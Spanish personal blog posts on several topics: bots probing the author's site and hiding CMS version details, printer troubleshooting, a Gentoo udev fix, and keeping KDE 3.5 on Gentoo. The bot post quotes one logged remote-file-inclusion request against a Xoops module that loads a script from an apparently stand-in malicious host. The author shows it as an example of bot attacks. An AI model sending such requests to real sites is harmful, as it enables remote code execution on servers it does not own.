En internet existen redes bots para enviar spam o para hacer ataques automáticos en páginas web encontradas en Google. Mi web como probablemente muchas más no está lejos de esta realidad y diariamente es atacada por docenas de bots y tipos de ataques.

En principio, estos bots son creados por alguien que pretende comprometer una web de manera automática en un CMS conocido, la gran mayoría con ataques simples de XSS o SQL Injection y tratando de explotar en muchos casos una vulnerabilidad conocida del CMS que uses.

Para evitar solo un poco este tipo de ataques que puede causar estragos si se nos olvida actualizar no está de más aplicar lo que se llama “oscuridad como seguridad”. Simplemente se trata de una técnica de eliminar cualquier información de qué CMS usas y qué versión. Si no lo haces,  estos datos son guardados por los buscadores y son los usados por los bots, si no los mostramos dichos bots no deberían atacar con frecuencia nuestra web.

Para demostrar un poco eso de los bots desde hace meses he recibido ataques en este tema de mi blog:  Actualizando de Xoops 2.0.18 a Xoops 2.3.0 RC Todos los ataques han sido de bots pretendiendo explotar una vulnerabilidad en Xoops CMS obviamente sin éxito.

/blog/2008/08/26/actualizando-de-xoops-2018-a-xoops-230-rc/xoops_lib/modules/protector/module_icon.php?mydirpath=http://web-maligna.com/id1.txt?

La razón obvia de ese ataque es que el tema en cuestión de mi bog incluye las frases xoops y la versión que a parte se muestra en google.

Debo decir que a mi me ha funcionado disminuyendo las visitas de bots que son molestos y consumen ancho de banda, pero esta técnica es completamente inútil para un atacante humano, así que no crean que agregarán mucha seguridad con esto ;)

PD: Existen bots que hacen pentest en las webs donde se desconoce el CMS y guardan los resultados en los servidores donde se alojan, así cuidense de los pentest también ;)

Salu2

No pretendo publicar una guía aquí y ahora sobre esto, solo algunos comentarios ya que los manuales y guías vendrán después :p

Para inyección de tinta:

• No toma la hoja a veces la impresora: los rodillos están sucios de la cera del papel que se pega en ellos. La solución es lijar los rodillos.
• No toma nunca papel: El rodillo no está girando por alguna razón, puede ser una pieza aislada, partida o un engrane dañado.
• A veces toma mal la hoja o la dobla: la solución 1 te servirá también.
• Tiene un sonido como un roce al imprimir: le hace falta aceite o vacelina a alguna pieza (incluso puede que le falten las 2 cosas).
• Hace ruidos extraños antes de imprimir, como si fuera a partir piezas: probablemente una pieza esté aislada o haya algo que esté obstruyendo el buen funcionamiento.
• Las luces encienden y apagan o marca una pantalla de error: En general esto representa que alguna de las pruebas internas de la impresoran no pasaron, algún problema de sensor o de engranajes suele ser la falla.
• Mancha las hojas y la impresión no es de buena calidad: El cartucho está sucio, con un poco de algodón y alcohol se soluciona ;)
• No imprime pero hace el proceso de impresión: el cartucho está seco o el cabezal está tapado, en el caso de que no sea eso, la cinta flex está partida, deberás probarla con un multímetro.
• En la impresión de fotos salen partes sin imprimir, incluso con cartuchos nuevos: La cinta lectora que le indica al cabezal la posición se borró en algunas zonas o está manchada, deberás cambiarla o limpiarla.
• El cabezal no se mueve: la cinta flex está dañada, el motor del cabezal se quemó o la tarjeta lógica no funciona.
• El cabezal se da golpes de un lado al otro: La cinta lectora está completamente dañada o el sensor de la cinta.
• Toma de manera infinita las hojas pero no imprime: el sensor de hoja se dañó o la palanca del sensor de hoja se partió.

Para matríz de punto:

• No todos los puntos en las impresiones son disparados: se rompió una de las agujas, deberás colocarle una aguja nueva o cambiar el cabezal. Puede haber problemas con la cinta flex también.
• En media impresión se detiene la impresora y enciende y apaga las luces: El cabezal se trancó por alguna razón. Deberás limpiar los engranajes y aplicar aceite y vaselina a las zonas correspondientes.
• Imprime muy claro pero la cinta es nueva: ajusta la posición del cabezal con la palanca que acerca el cabezal. No lo acerques demasiado porque podrías partir las agujas.
• No toma bien el papel: Lija el rodillo y limpia los alrrededores.

Soluciones definitivas:

En el 90% de los casos, una impresora falla por falta de mantenimiento. La solución definitiva es eso,m mantenimiento COMPLETO, es decir, desarmar cada pieza y limpiarlas una por una, si te dedicas a reparar solo la falla no estás haciendo NADA.

Esta es una lista de mi experiencia con impresoras, probablemente hayan más pero no las recuerdo.

Salu2

La procrastinación es definido según wikipedia de la siguiente forma:

Es la acción (o hábito) de postergar actividades o situaciones que uno debe atender, por otras situaciones más irrelevantes y agradables.

Hasta hace no mucho estaba procrastinando con mi web y de hecho podría decir que aún lo estoy pero en otras tareas de mi vida. Había dejado de actualizar los gestores de contenido de mi web dejando grandes agujeros de seguridad que según vi en los logs fueron tratados de explotar sin éxito gracias a mis otras protecciones :p

Había dejado mi web algo desordenada y olvidada, pero es hora de dejar de procrastinar un poco y responder los mails de preguntas y sugerencias de la web así como responder los comentarios. Cambié el theme, actualicé todo, revisé algunos logs de acceso… en fin, faltan muchos detalles de optimización y revisión de la web y lo iré haciendo mientras pasa la semana.

Actualicé el gestor de contenidos y estaré revisando mis reglas de seguridad, si notan algo que no funcione pueden avisarme ;)

Salu2

Después de actualizar udev a la versión 146-r1 en gentoo linux unos días atrás comenzó a aparecer un mensaje al iniciar el sistema que decía lo siguiente:

udev: missing sysfs features; please update the kernel or disable the kernel’s CONFIG_SYSFS_DEPRECATED option; udev may fail to work correct

Como uso un kernel descargado desde kernel.org y un poco personalizado se produjo ese error gracias a una opción que no se debe usar en el kernel con la nueva versión de udev. Solo basta con deshabilitar la opción CONFIG_SYSFS_DEPRECATED_V2 que se encuentra en General Setup – remove sysfs features which may confuse old userspace tools.

Al desactivar esa opción que ya no es necesaria se soluciona el problema ;)

Salu2

Como más de uno debe saber hace no mucho en Gentoo Linux eliminaron del tree todo lo relacionado con KDE 3 lo cual es una joda para mi. Ahora estará como stable KDE 4 y todos sus paquetes dependientes.

Lo malo de esto es que antes podías tener programas dependientes de KDE sin necesidad de usar la use +kde y sin necesidad de instalar demasiadas librerías de kde 3, con solo compilar kdelibs (que ya es bastante grande) y alguna otra dependencia pequeña del programa valía, ahora no! con KDE 4 debes colocar la use +kde en tu package.use o en el make.conf para instalar algo tan simple como k3b en mi caso y ello implica instalar kde-base que no lo quiero en mi sistema. Menos mal a muchos como yo no les gustó la idea y se pusieron manos a la obra, puedes seguir estos pasos para mantener kde3 en tu sistema:

I. Agregando kde-sunset:

1. Instalamos layman con la use +git con el comando:

USE=”git” emerge -av layman

O modificando el /etc/portage/package.use para instalar layman con la use +git como fue mi caso.

2. Ejecutamos los siguientes comandos para agregar a kde-sunset:

layman -f
layman -a kde-sunset

3. Si es la primera vez que usamos layman debemos colocar la siguiente línea al final del make.conf

source /usr/local/portage/layman/make.conf

4. Ejecutamos el siguiente comando para mantener actualizado kde-sunset:

layman -s kde-sunset

II. Desenmascarar KDE 3.5

KDE 3 ahora está como masked, debemos desenmascararlo y tenemos 3 posibles formas de hacerlo:

1.1- Si tu package.unmask es un directorio, haz un enlace simbólico desde kde-sunset a /etc/portage/package.unmask con el siguiente comando:

ln -s /usr/local/portage/layman/kde-sunset/Documentation/package.unmask/kde-3.5 /etc/portage/package.unmask/kde-3.5

Nota: si no tienes un package.unmask puedes crearlo con mkdir /etc/portage/package.unmask

1.2- Si tu package.unmask es un archivo ejecuta el siguiente comando:

cat /usr/local/portage/layman/kde-sunset/Documentation/package.unmask/kde-3.5 >> /etc/portage/package.unmask

1.3- Si no te agradan las 2 opciones de arriba puedes usar autounmask:

emerge autounmask

Luego ejecutas el comando:

autounmask kde-sunset

III. Utilizando KDE 3.5

Ahora debemos indicarle a emerge que usaremos KDE 3.5 en vez de KDE 4, sino cuando usemos emerge -avDuN world nos instalará de nuevo la versión 4, así que debemos seguir estos pasos:

1.1 Si tenemos instalados los programas de KDE 3.5 en nuestro sistema debemos editar el archivo /var/lib/portage/world y buscar todos los programas y dependencias de kde que tengamos y agregarles un :3.5 al final, por ejemplo en mi caso que uso k3b queda así:

app-cdr/k3b:3.5

1.2 Si no tenemos aún programas de kde 3 instalados y queremos instalarlos solo basta con colocar emerge k3b:3.5 y listo. Recuerden luego seguir el paso 1 después de instalarlo porque sino les pedirá instalar la versión 4 ;).

Me basé en esta guía: how-to: keep your kde 3.5 after it’s removed from gentoo’s tree, using the kde-sunset overlay

Disfruten su KDE 3.5 como yo :D

Salu2